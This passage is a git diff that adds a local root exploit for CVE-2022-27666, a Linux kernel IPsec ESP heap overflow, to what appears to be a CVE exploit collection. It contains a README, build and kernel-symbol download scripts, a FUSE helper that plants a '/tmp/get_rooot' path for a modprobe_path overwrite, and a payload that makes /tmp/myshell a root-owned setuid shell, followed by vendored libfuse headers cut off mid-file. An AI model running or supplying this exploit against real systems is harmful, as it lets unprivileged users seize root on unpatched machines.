diff --git a/cve/linux-kernel/2022/CVE-2022-0995/README.md b/cve/linux-kernel/2022/CVE-2022-0995/README.md index b2e5f7812e704b5997ed55faccd6d9cb67aa18f2..ef91ef8243d46c1d6e33674b39c86e50654e698b 100644 --- a/cve/linux-kernel/2022/CVE-2022-0995/README.md +++ b/cve/linux-kernel/2022/CVE-2022-0995/README.md @@ -9,4 +9,4 @@ make ./exploit ``` - \ No newline at end of file +![](./poc.png) \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/README.md b/cve/linux-kernel/2022/CVE-2022-27666/README.md new file mode 100644 index 0000000000000000000000000000000000000000..397df2c5977035462ebb261c20d11fac38f7f3ff --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/README.md @@ -0,0 +1,17 @@ +**漏洞描述:** + +这是针对CVE-2022-27666的漏洞,该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 + +**影响版本:** + +linux kernel 5.17-rc5 + +**漏洞危害** + +漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。 + +**参考资料** + +代码来自:https://github.com/plummm/CVE-2022-27666 + +参考链接:https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/compile.sh b/cve/linux-kernel/2022/CVE-2022-27666/compile.sh new file mode 100755 index 0000000000000000000000000000000000000000..86094dcfcf40bcbba961ab660557ad7309e5591e --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/compile.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +gcc -o get_rooot get_rooot.c -w +gcc -o myshell myshell.c -w +gcc -no-pie -static poc.c fuse_evil.c -I./libfuse libfuse3.a -o poc -masm=intel -pthread -w \ + -D EXPAND_LOWER_ORDER -D VERSION_5_30 -D KERNEL_LEAK -D KERNEL_EXP + +chmod +x ./download_symbol.sh +./download_symbol.sh \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh b/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh new file mode 100755 index 0000000000000000000000000000000000000000..dc4897a4d61287e875dcf2da1d36c61791343d70 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh @@ -0,0 +1,40 @@ +#! /bin/bash + +SYM_PATH=`pwd`"/symbol" +if [ -d ${SYM_PATH} ]; then + echo "symbol downloaded" + exit 0 +fi + +kernel_version=$(uname -r) +echo "Kernel version : ${kernel_version}" + +kernel_pkg_version=$(dpkg -l | grep linux-modules-$(uname -r) | head -1 | awk '{ print $3; }') +echo "Kernel package version : ${kernel_pkg_version}" + +pkg_name="linux-modules-${kernel_version}_${kernel_pkg_version}_amd64.deb" +pkg_uri="http://archive.ubuntu.com/ubuntu/pool/main/l/linux/${pkg_name}" +echo "Downloading package linux-modules at ${pkg_uri}" + +mkdir -p symbols/${kernel_version} +cd symbols/${kernel_version} + +wget ${pkg_uri} -O ${pkg_name} +mkdir -p extract +dpkg -x ${pkg_name} extract/ + +symbols_file="extract/boot/System.map-${kernel_version}" +if [ ! -f ${symbols_file} ]; then + echo "Failed to extract symbol file. Check download of Ubuntu package" + cd ../../ + rm -rf symbols + cd - > /dev/null + exit 1 +else + echo "Symbol file found. Cleaning directory..." + mv ${symbols_file} .. +fi + +cd - > /dev/null +rm -rf symbols/${kernel_version} +echo "Symbol file : System.map-${kernel_version}" diff --git a/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.c b/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.c new file mode 100644 index 0000000000000000000000000000000000000000..aed83e208915f9e4c642f6c971a4fd4c9bf08cff --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.c @@ -0,0 +1,92 @@ +#include "fuse_evil.h" + +const char *evil_path = "evil"; +char *evil_str = "/tmp/get_rooot\x00"; + +int fuse_pipes[2]; +// https://www.maastaar.net/fuse/linux/filesystem/c/2016/05/21/writing-a-simple-filesystem-using-fuse/ + +int evil_read_pause(const char *path, char *buf, size_t size, off_t offset, + struct fuse_file_info *fi) +{ + // change to modprobe_path + char signal; + size_t len = 0x10000; + + if (offset + size > len) + size = len - offset; + + memset(evil_buffer + offset, 0x43, size); + char *evil = evil_str; + memcpy((void *)(evil_buffer + 0x1000-0x30), evil, strlen(evil)); + + if (offset >= len) + return size; + + memcpy(buf, evil_buffer + offset, size); + pause(); + return size; +} + +int evil_read_sleep(const char *path, char *buf, size_t size, off_t offset, + struct fuse_file_info *fi) +{ + // change to modprobe_path + char signal; + size_t len = 0x10000; + + if (offset + size > len) + size = len - offset; + + memset(evil_buffer + offset, 0x43, size); + char *evil = evil_str; + memcpy((void *)(evil_buffer + 0x1000-0x30), evil, strlen(evil)); + + if (offset >= len) + return size; + + memcpy(buf, evil_buffer + offset, size); + read(fuse_pipes[0], &signal, 1); + return size; +} + +int evil_getattr(const char *path, struct stat *stbuf, + struct fuse_file_info *fi) +{ + int res = 0; + + memset(stbuf, 0, sizeof(struct stat)); + + if (strcmp(path, "/") == 0) + { + stbuf->st_mode = S_IFDIR | 0755; + stbuf->st_nlink = 2; + } + else if (strcmp(path + 1, evil_path) == 0) + { + stbuf->st_mode = S_IFREG | 0444; + stbuf->st_nlink = 1; + stbuf->st_size = 0x1000; + } + else + { + res = -ENOENT; + } + + return res; +} + + +int evil_readdir(const char *path, void *buf, fuse_fill_dir_t filler, + off_t offset, struct fuse_file_info *fi, + enum fuse_readdir_flags flags) +{ + if (strcmp(path, "/") != 0) + return -ENOENT; + + filler(buf, ".", NULL, 0, 0); + filler(buf, "..", NULL, 0, 0); + filler(buf, evil_path, NULL, 0, 0); + + return 0; +} \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.h b/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.h new file mode 100644 index 0000000000000000000000000000000000000000..9281183d4d541b08e70a3c91f07484cc2953d7e7 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.h @@ -0,0 +1,32 @@ +#define FUSE_USE_VERSION 34 +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include + +#define MNT_PATH "evil" + +extern const char *evil_path; +extern int fuse_pipes[2]; +extern char *evil_str; +extern char *evil_buffer; +extern int pause_flag; + +int evil_read_pause(const char *path, char *buf, size_t size, off_t offset, + struct fuse_file_info *fi); + +int evil_read_sleep(const char *path, char *buf, size_t size, off_t offset, + struct fuse_file_info *fi); + +int evil_getattr(const char *path, struct stat *stbuf, + struct fuse_file_info *fi); + +int evil_readdir(const char *path, void *buf, fuse_fill_dir_t filler, + off_t offset, struct fuse_file_info *fi, + enum fuse_readdir_flags flags); \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/get_rooot.c b/cve/linux-kernel/2022/CVE-2022-27666/get_rooot.c new file mode 100644 index 0000000000000000000000000000000000000000..9ca6135aacc39a942b1793d728b9c1fbbd238a84 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/get_rooot.c @@ -0,0 +1,9 @@ +#include +#include + +int main() +{ + system("chown root:root /tmp/myshell"); + system("chmod 4755 /tmp/myshell"); + system("/usr/bin/touch /tmp/exploited"); +} \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/cuse_lowlevel.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/cuse_lowlevel.h new file mode 100644 index 0000000000000000000000000000000000000000..80476c20b5125e5662075f4c8f576c56038a0ab3 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/cuse_lowlevel.h @@ -0,0 +1,87 @@ +/* + CUSE: Character device in Userspace + Copyright (C) 2008-2009 SUSE Linux Products GmbH + Copyright (C) 2008-2009 Tejun Heo + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. + + Read example/cusexmp.c for usages. +*/ + +#ifndef CUSE_LOWLEVEL_H_ +#define CUSE_LOWLEVEL_H_ + +#ifndef FUSE_USE_VERSION +#define FUSE_USE_VERSION 29 +#endif + +#include "fuse_lowlevel.h" + +#include +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +#define CUSE_UNRESTRICTED_IOCTL (1 << 0) /* use unrestricted ioctl */ + +struct fuse_session; + +struct cuse_info { + unsigned dev_major; + unsigned dev_minor; + unsigned dev_info_argc; + const char **dev_info_argv; + unsigned flags; +}; + +/* + * Most ops behave almost identically to the matching fuse_lowlevel + * ops except that they don't take @ino. + * + * init_done : called after initialization is complete + * read/write : always direct IO, simultaneous operations allowed + * ioctl : might be in unrestricted mode depending on ci->flags + */ +struct cuse_lowlevel_ops { + void (*init) (void *userdata, struct fuse_conn_info *conn); + void (*init_done) (void *userdata); + void (*destroy) (void *userdata); + void (*open) (fuse_req_t req, struct fuse_file_info *fi); + void (*read) (fuse_req_t req, size_t size, off_t off, + struct fuse_file_info *fi); + void (*write) (fuse_req_t req, const char *buf, size_t size, off_t off, + struct fuse_file_info *fi); + void (*flush) (fuse_req_t req, struct fuse_file_info *fi); + void (*release) (fuse_req_t req, struct fuse_file_info *fi); + void (*fsync) (fuse_req_t req, int datasync, struct fuse_file_info *fi); + void (*ioctl) (fuse_req_t req, int cmd, void *arg, + struct fuse_file_info *fi, unsigned int flags, + const void *in_buf, size_t in_bufsz, size_t out_bufsz); + void (*poll) (fuse_req_t req, struct fuse_file_info *fi, + struct fuse_pollhandle *ph); +}; + +struct fuse_session *cuse_lowlevel_new(struct fuse_args *args, + const struct cuse_info *ci, + const struct cuse_lowlevel_ops *clop, + void *userdata); + +struct fuse_session *cuse_lowlevel_setup(int argc, char *argv[], + const struct cuse_info *ci, + const struct cuse_lowlevel_ops *clop, + int *multithreaded, void *userdata); + +void cuse_lowlevel_teardown(struct fuse_session *se); + +int cuse_lowlevel_main(int argc, char *argv[], const struct cuse_info *ci, + const struct cuse_lowlevel_ops *clop, void *userdata); + +#ifdef __cplusplus +} +#endif + +#endif /* CUSE_LOWLEVEL_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse.h new file mode 100644 index 0000000000000000000000000000000000000000..a273b15b9161d5c1c31cdfc15fe4226d2ef38d68 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse.h @@ -0,0 +1,1296 @@ +/* + FUSE: Filesystem in Userspace + Copyright (C) 2001-2007 Miklos Szeredi + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +#ifndef FUSE_H_ +#define FUSE_H_ + +/** @file + * + * This file defines the library interface of FUSE + * + * IMPORTANT: you should define FUSE_USE_VERSION before including this header. + */ + +#include "fuse_common.h" + +#include +#include +#include +#include +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +/* ----------------------------------------------------------- * + * Basic FUSE API * + * ----------------------------------------------------------- */ + +/** Handle for a FUSE filesystem */ +struct fuse; + +/** + * Readdir flags, passed to ->readdir() + */ +enum fuse_readdir_flags { + /** + * "Plus" mode. + * + * The kernel wants to prefill the inode cache during readdir. The + * filesystem may honour this by filling in the attributes and setting + * FUSE_FILL_DIR_FLAGS for the filler function. The filesystem may also + * just ignore this flag completely. + */ + FUSE_READDIR_PLUS = (1 << 0) +}; + +/** + * Readdir flags, passed to fuse_fill_dir_t callback. + */ +enum fuse_fill_dir_flags { + /** + * "Plus" mode: all file attributes are valid + * + * The attributes are used by the kernel to prefill the inode cache + * during a readdir. + * + * It is okay to set FUSE_FILL_DIR_PLUS if FUSE_READDIR_PLUS is not set + * and vice versa. + */ + FUSE_FILL_DIR_PLUS = (1 << 1) +}; + +/** Function to add an entry in a readdir() operation + * + * The *off* parameter can be any non-zero value that enables the + * filesystem to identify the current point in the directory + * stream. It does not need to be the actual physical position. A + * value of zero is reserved to indicate that seeking in directories + * is not supported. + * + * @param buf the buffer passed to the readdir() operation + * @param name the file name of the directory entry + * @param stbuf file attributes, can be NULL + * @param off offset of the next entry or zero + * @param flags fill flags + * @return 1 if buffer is full, zero otherwise + */ +typedef int (*fuse_fill_dir_t) (void *buf, const char *name, + const struct stat *stbuf, off_t off, + enum fuse_fill_dir_flags flags); +/** + * Configuration of the high-level API + * + * This structure is initialized from the arguments passed to + * fuse_new(), and then passed to the file system's init() handler + * which should ensure that the configuration is compatible with the + * file system implementation. + */ +struct fuse_config { + /** + * If `set_gid` is non-zero, the st_gid attribute of each file + * is overwritten with the value of `gid`. + */ + int set_gid; + unsigned int gid; + + /** + * If `set_uid` is non-zero, the st_uid attribute of each file + * is overwritten with the value of `uid`. + */ + int set_uid; + unsigned int uid; + + /** + * If `set_mode` is non-zero, the any permissions bits set in + * `umask` are unset in the st_mode attribute of each file. + */ + int set_mode; + unsigned int umask; + + /** + * The timeout in seconds for which name lookups will be + * cached. + */ + double entry_timeout; + + /** + * The timeout in seconds for which a negative lookup will be + * cached. This means, that if file did not exist (lookup + * returned ENOENT), the lookup will only be redone after the + * timeout, and the file/directory will be assumed to not + * exist until then. A value of zero means that negative + * lookups are not cached. + */ + double negative_timeout; + + /** + * The timeout in seconds for which file/directory attributes + * (as returned by e.g. the `getattr` handler) are cached. + */ + double attr_timeout; + + /** + * Allow requests to be interrupted + */ + int intr; + + /** + * Specify which signal number to send to the filesystem when + * a request is interrupted. The default is hardcoded to + * USR1. + */ + int intr_signal; + + /** + * Normally, FUSE assigns inodes to paths only for as long as + * the kernel is aware of them. With this option inodes are + * instead remembered for at least this many seconds. This + * will require more memory, but may be necessary when using + * applications that make use of inode numbers. + * + * A number of -1 means that inodes will be remembered for the + * entire life-time of the file-system process. + */ + int remember; + + /** + * The default behavior is that if an open file is deleted, + * the file is renamed to a hidden file (.fuse_hiddenXXX), and + * only removed when the file is finally released. This + * relieves the filesystem implementation of having to deal + * with this problem. This option disables the hiding + * behavior, and files are removed immediately in an unlink + * operation (or in a rename operation which overwrites an + * existing file). + * + * It is recommended that you not use the hard_remove + * option. When hard_remove is set, the following libc + * functions fail on unlinked files (returning errno of + * ENOENT): read(2), write(2), fsync(2), close(2), f*xattr(2), + * ftruncate(2), fstat(2), fchmod(2), fchown(2) + */ + int hard_remove; + + /** + * Honor the st_ino field in the functions getattr() and + * fill_dir(). This value is used to fill in the st_ino field + * in the stat(2), lstat(2), fstat(2) functions and the d_ino + * field in the readdir(2) function. The filesystem does not + * have to guarantee uniqueness, however some applications + * rely on this value being unique for the whole filesystem. + * + * Note that this does *not* affect the inode that libfuse + * and the kernel use internally (also called the "nodeid"). + */ + int use_ino; + + /** + * If use_ino option is not given, still try to fill in the + * d_ino field in readdir(2). If the name was previously + * looked up, and is still in the cache, the inode number + * found there will be used. Otherwise it will be set to -1. + * If use_ino option is given, this option is ignored. + */ + int readdir_ino; + + /** + * This option disables the use of page cache (file content cache) + * in the kernel for this filesystem. This has several affects: + * + * 1. Each read(2) or write(2) system call will initiate one + * or more read or write operations, data will not be + * cached in the kernel. + * + * 2. The return value of the read() and write() system calls + * will correspond to the return values of the read and + * write operations. This is useful for example if the + * file size is not known in advance (before reading it). + * + * Internally, enabling this option causes fuse to set the + * `direct_io` field of `struct fuse_file_info` - overwriting + * any value that was put there by the file system. + */ + int direct_io; + + /** + * This option disables flushing the cache of the file + * contents on every open(2). This should only be enabled on + * filesystems where the file data is never changed + * externally (not through the mounted FUSE filesystem). Thus + * it is not suitable for network filesystems and other + * intermediate filesystems. + * + * NOTE: if this option is not specified (and neither + * direct_io) data is still cached after the open(2), so a + * read(2) system call will not always initiate a read + * operation. + * + * Internally, enabling this option causes fuse to set the + * `keep_cache` field of `struct fuse_file_info` - overwriting + * any value that was put there by the file system. + */ + int kernel_cache; + + /** + * This option is an alternative to `kernel_cache`. Instead of + * unconditionally keeping cached data, the cached data is + * invalidated on open(2) if if the modification time or the + * size of the file has changed since it was last opened. + */ + int auto_cache; + + /** + * The timeout in seconds for which file attributes are cached + * for the purpose of checking if auto_cache should flush the + * file data on open. + */ + int ac_attr_timeout_set; + double ac_attr_timeout; + + /** + * If this option is given the file-system handlers for the + * following operations will not receive path information: + * read, write, flush, release, fallocate, fsync, readdir, + * releasedir, fsyncdir, lock, ioctl and poll. + * + * For the truncate, getattr, chmod, chown and utimens + * operations the path will be provided only if the struct + * fuse_file_info argument is NULL. + */ + int nullpath_ok; + + /** + * The remaining options are used by libfuse internally and + * should not be touched. + */ + int show_help; + char *modules; + int debug; +}; + + +/** + * The file system operations: + * + * Most of these should work very similarly to the well known UNIX + * file system operations. A major exception is that instead of + * returning an error in 'errno', the operation should return the + * negated error value (-errno) directly. + * + * All methods are optional, but some are essential for a useful + * filesystem (e.g. getattr). Open, flush, release, fsync, opendir, + * releasedir, fsyncdir, access, create, truncate, lock, init and + * destroy are special purpose methods, without which a full featured + * filesystem can still be implemented. + * + * In general, all methods are expected to perform any necessary + * permission checking. However, a filesystem may delegate this task + * to the kernel by passing the `default_permissions` mount option to + * `fuse_new()`. In this case, methods will only be called if + * the kernel's permission check has succeeded. + * + * Almost all operations take a path which can be of any length. + */ +struct fuse_operations { + /** Get file attributes. + * + * Similar to stat(). The 'st_dev' and 'st_blksize' fields are + * ignored. The 'st_ino' field is ignored except if the 'use_ino' + * mount option is given. In that case it is passed to userspace, + * but libfuse and the kernel will still assign a different + * inode for internal use (called the "nodeid"). + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + */ + int (*getattr) (const char *, struct stat *, struct fuse_file_info *fi); + + /** Read the target of a symbolic link + * + * The buffer should be filled with a null terminated string. The + * buffer size argument includes the space for the terminating + * null character. If the linkname is too long to fit in the + * buffer, it should be truncated. The return value should be 0 + * for success. + */ + int (*readlink) (const char *, char *, size_t); + + /** Create a file node + * + * This is called for creation of all non-directory, non-symlink + * nodes. If the filesystem defines a create() method, then for + * regular files that will be called instead. + */ + int (*mknod) (const char *, mode_t, dev_t); + + /** Create a directory + * + * Note that the mode argument may not have the type specification + * bits set, i.e. S_ISDIR(mode) can be false. To obtain the + * correct directory type bits use mode|S_IFDIR + * */ + int (*mkdir) (const char *, mode_t); + + /** Remove a file */ + int (*unlink) (const char *); + + /** Remove a directory */ + int (*rmdir) (const char *); + + /** Create a symbolic link */ + int (*symlink) (const char *, const char *); + + /** Rename a file + * + * *flags* may be `RENAME_EXCHANGE` or `RENAME_NOREPLACE`. If + * RENAME_NOREPLACE is specified, the filesystem must not + * overwrite *newname* if it exists and return an error + * instead. If `RENAME_EXCHANGE` is specified, the filesystem + * must atomically exchange the two files, i.e. both must + * exist and neither may be deleted. + */ + int (*rename) (const char *, const char *, unsigned int flags); + + /** Create a hard link to a file */ + int (*link) (const char *, const char *); + + /** Change the permission bits of a file + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + */ + int (*chmod) (const char *, mode_t, struct fuse_file_info *fi); + + /** Change the owner and group of a file + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + */ + int (*chown) (const char *, uid_t, gid_t, struct fuse_file_info *fi); + + /** Change the size of a file + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + */ + int (*truncate) (const char *, off_t, struct fuse_file_info *fi); + + /** Open a file + * + * Open flags are available in fi->flags. The following rules + * apply. + * + * - Creation (O_CREAT, O_EXCL, O_NOCTTY) flags will be + * filtered out / handled by the kernel. + * + * - Access modes (O_RDONLY, O_WRONLY, O_RDWR, O_EXEC, O_SEARCH) + * should be used by the filesystem to check if the operation is + * permitted. If the ``-o default_permissions`` mount option is + * given, this check is already done by the kernel before calling + * open() and may thus be omitted by the filesystem. + * + * - When writeback caching is enabled, the kernel may send + * read requests even for files opened with O_WRONLY. The + * filesystem should be prepared to handle this. + * + * - When writeback caching is disabled, the filesystem is + * expected to properly handle the O_APPEND flag and ensure + * that each write is appending to the end of the file. + * + * - When writeback caching is enabled, the kernel will + * handle O_APPEND. However, unless all changes to the file + * come through the kernel this will not work reliably. The + * filesystem should thus either ignore the O_APPEND flag + * (and let the kernel handle it), or return an error + * (indicating that reliably O_APPEND is not available). + * + * Filesystem may store an arbitrary file handle (pointer, + * index, etc) in fi->fh, and use this in other all other file + * operations (read, write, flush, release, fsync). + * + * Filesystem may also implement stateless file I/O and not store + * anything in fi->fh. + * + * There are also some flags (direct_io, keep_cache) which the + * filesystem may set in fi, to change the way the file is opened. + * See fuse_file_info structure in for more details. + * + * If this request is answered with an error code of ENOSYS + * and FUSE_CAP_NO_OPEN_SUPPORT is set in + * `fuse_conn_info.capable`, this is treated as success and + * future calls to open will also succeed without being send + * to the filesystem process. + * + */ + int (*open) (const char *, struct fuse_file_info *); + + /** Read data from an open file + * + * Read should return exactly the number of bytes requested except + * on EOF or error, otherwise the rest of the data will be + * substituted with zeroes. An exception to this is when the + * 'direct_io' mount option is specified, in which case the return + * value of the read system call will reflect the return value of + * this operation. + */ + int (*read) (const char *, char *, size_t, off_t, + struct fuse_file_info *); + + /** Write data to an open file + * + * Write should return exactly the number of bytes requested + * except on error. An exception to this is when the 'direct_io' + * mount option is specified (see read operation). + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + */ + int (*write) (const char *, const char *, size_t, off_t, + struct fuse_file_info *); + + /** Get file system statistics + * + * The 'f_favail', 'f_fsid' and 'f_flag' fields are ignored + */ + int (*statfs) (const char *, struct statvfs *); + + /** Possibly flush cached data + * + * BIG NOTE: This is not equivalent to fsync(). It's not a + * request to sync dirty data. + * + * Flush is called on each close() of a file descriptor, as opposed to + * release which is called on the close of the last file descriptor for + * a file. Under Linux, errors returned by flush() will be passed to + * userspace as errors from close(), so flush() is a good place to write + * back any cached dirty data. However, many applications ignore errors + * on close(), and on non-Linux systems, close() may succeed even if flush() + * returns an error. For these reasons, filesystems should not assume + * that errors returned by flush will ever be noticed or even + * delivered. + * + * NOTE: The flush() method may be called more than once for each + * open(). This happens if more than one file descriptor refers to an + * open file handle, e.g. due to dup(), dup2() or fork() calls. It is + * not possible to determine if a flush is final, so each flush should + * be treated equally. Multiple write-flush sequences are relatively + * rare, so this shouldn't be a problem. + * + * Filesystems shouldn't assume that flush will be called at any + * particular point. It may be called more times than expected, or not + * at all. + * + * [close]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/close.html + */ + int (*flush) (const char *, struct fuse_file_info *); + + /** Release an open file + * + * Release is called when there are no more references to an open + * file: all file descriptors are closed and all memory mappings + * are unmapped. + * + * For every open() call there will be exactly one release() call + * with the same flags and file handle. It is possible to + * have a file opened more than once, in which case only the last + * release will mean, that no more reads/writes will happen on the + * file. The return value of release is ignored. + */ + int (*release) (const char *, struct fuse_file_info *); + + /** Synchronize file contents + * + * If the datasync parameter is non-zero, then only the user data + * should be flushed, not the meta data. + */ + int (*fsync) (const char *, int, struct fuse_file_info *); + + /** Set extended attributes */ + int (*setxattr) (const char *, const char *, const char *, size_t, int); + + /** Get extended attributes */ + int (*getxattr) (const char *, const char *, char *, size_t); + + /** List extended attributes */ + int (*listxattr) (const char *, char *, size_t); + + /** Remove extended attributes */ + int (*removexattr) (const char *, const char *); + + /** Open directory + * + * Unless the 'default_permissions' mount option is given, + * this method should check if opendir is permitted for this + * directory. Optionally opendir may also return an arbitrary + * filehandle in the fuse_file_info structure, which will be + * passed to readdir, releasedir and fsyncdir. + */ + int (*opendir) (const char *, struct fuse_file_info *); + + /** Read directory + * + * The filesystem may choose between two modes of operation: + * + * 1) The readdir implementation ignores the offset parameter, and + * passes zero to the filler function's offset. The filler + * function will not return '1' (unless an error happens), so the + * whole directory is read in a single readdir operation. + * + * 2) The readdir implementation keeps track of the offsets of the + * directory entries. It uses the offset parameter and always + * passes non-zero offset to the filler function. When the buffer + * is full (or an error happens) the filler function will return + * '1'. + */ + int (*readdir) (const char *, void *, fuse_fill_dir_t, off_t, + struct fuse_file_info *, enum fuse_readdir_flags); + + /** Release directory + * + * If the directory has been removed after the call to opendir, the + * path parameter will be NULL. + */ + int (*releasedir) (const char *, struct fuse_file_info *); + + /** Synchronize directory contents + * + * If the directory has been removed after the call to opendir, the + * path parameter will be NULL. + * + * If the datasync parameter is non-zero, then only the user data + * should be flushed, not the meta data + */ + int (*fsyncdir) (const char *, int, struct fuse_file_info *); + + /** + * Initialize filesystem + * + * The return value will passed in the `private_data` field of + * `struct fuse_context` to all file operations, and as a + * parameter to the destroy() method. It overrides the initial + * value provided to fuse_main() / fuse_new(). + */ + void *(*init) (struct fuse_conn_info *conn, + struct fuse_config *cfg); + + /** + * Clean up filesystem + * + * Called on filesystem exit. + */ + void (*destroy) (void *private_data); + + /** + * Check file access permissions + * + * This will be called for the access() system call. If the + * 'default_permissions' mount option is given, this method is not + * called. + * + * This method is not called under Linux kernel versions 2.4.x + */ + int (*access) (const char *, int); + + /** + * Create and open a file + * + * If the file does not exist, first create it with the specified + * mode, and then open it. + * + * If this method is not implemented or under Linux kernel + * versions earlier than 2.6.15, the mknod() and open() methods + * will be called instead. + */ + int (*create) (const char *, mode_t, struct fuse_file_info *); + + /** + * Perform POSIX file locking operation + * + * The cmd argument will be either F_GETLK, F_SETLK or F_SETLKW. + * + * For the meaning of fields in 'struct flock' see the man page + * for fcntl(2). The l_whence field will always be set to + * SEEK_SET. + * + * For checking lock ownership, the 'fuse_file_info->owner' + * argument must be used. + * + * For F_GETLK operation, the library will first check currently + * held locks, and if a conflicting lock is found it will return + * information without calling this method. This ensures, that + * for local locks the l_pid field is correctly filled in. The + * results may not be accurate in case of race conditions and in + * the presence of hard links, but it's unlikely that an + * application would rely on accurate GETLK results in these + * cases. If a conflicting lock is not found, this method will be + * called, and the filesystem may fill out l_pid by a meaningful + * value, or it may leave this field zero. + * + * For F_SETLK and F_SETLKW the l_pid field will be set to the pid + * of the process performing the locking operation. + * + * Note: if this method is not implemented, the kernel will still + * allow file locking to work locally. Hence it is only + * interesting for network filesystems and similar. + */ + int (*lock) (const char *, struct fuse_file_info *, int cmd, + struct flock *); + + /** + * Change the access and modification times of a file with + * nanosecond resolution + * + * This supersedes the old utime() interface. New applications + * should use this. + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + * + * See the utimensat(2) man page for details. + */ + int (*utimens) (const char *, const struct timespec tv[2], + struct fuse_file_info *fi); + + /** + * Map block index within file to block index within device + * + * Note: This makes sense only for block device backed filesystems + * mounted with the 'blkdev' option + */ + int (*bmap) (const char *, size_t blocksize, uint64_t *idx); + +#if FUSE_USE_VERSION < 35 + int (*ioctl) (const char *, int cmd, void *arg, + struct fuse_file_info *, unsigned int flags, void *data); +#else + /** + * Ioctl + * + * flags will have FUSE_IOCTL_COMPAT set for 32bit ioctls in + * 64bit environment. The size and direction of data is + * determined by _IOC_*() decoding of cmd. For _IOC_NONE, + * data will be NULL, for _IOC_WRITE data is out area, for + * _IOC_READ in area and if both are set in/out area. In all + * non-NULL cases, the area is of _IOC_SIZE(cmd) bytes. + * + * If flags has FUSE_IOCTL_DIR then the fuse_file_info refers to a + * directory file handle. + * + * Note : the unsigned long request submitted by the application + * is truncated to 32 bits. + */ + int (*ioctl) (const char *, unsigned int cmd, void *arg, + struct fuse_file_info *, unsigned int flags, void *data); +#endif + + /** + * Poll for IO readiness events + * + * Note: If ph is non-NULL, the client should notify + * when IO readiness events occur by calling + * fuse_notify_poll() with the specified ph. + * + * Regardless of the number of times poll with a non-NULL ph + * is received, single notification is enough to clear all. + * Notifying more times incurs overhead but doesn't harm + * correctness. + * + * The callee is responsible for destroying ph with + * fuse_pollhandle_destroy() when no longer in use. + */ + int (*poll) (const char *, struct fuse_file_info *, + struct fuse_pollhandle *ph, unsigned *reventsp); + + /** Write contents of buffer to an open file + * + * Similar to the write() method, but data is supplied in a + * generic buffer. Use fuse_buf_copy() to transfer data to + * the destination. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + */ + int (*write_buf) (const char *, struct fuse_bufvec *buf, off_t off, + struct fuse_file_info *); + + /** Store data from an open file in a buffer + * + * Similar to the read() method, but data is stored and + * returned in a generic buffer. + * + * No actual copying of data has to take place, the source + * file descriptor may simply be stored in the buffer for + * later data transfer. + * + * The buffer must be allocated dynamically and stored at the + * location pointed to by bufp. If the buffer contains memory + * regions, they too must be allocated using malloc(). The + * allocated memory will be freed by the caller. + */ + int (*read_buf) (const char *, struct fuse_bufvec **bufp, + size_t size, off_t off, struct fuse_file_info *); + /** + * Perform BSD file locking operation + * + * The op argument will be either LOCK_SH, LOCK_EX or LOCK_UN + * + * Nonblocking requests will be indicated by ORing LOCK_NB to + * the above operations + * + * For more information see the flock(2) manual page. + * + * Additionally fi->owner will be set to a value unique to + * this open file. This same value will be supplied to + * ->release() when the file is released. + * + * Note: if this method is not implemented, the kernel will still + * allow file locking to work locally. Hence it is only + * interesting for network filesystems and similar. + */ + int (*flock) (const char *, struct fuse_file_info *, int op); + + /** + * Allocates space for an open file + * + * This function ensures that required space is allocated for specified + * file. If this function returns success then any subsequent write + * request to specified range is guaranteed not to fail because of lack + * of space on the file system media. + */ + int (*fallocate) (const char *, int, off_t, off_t, + struct fuse_file_info *); + + /** + * Copy a range of data from one file to another + * + * Performs an optimized copy between two file descriptors without the + * additional cost of transferring data 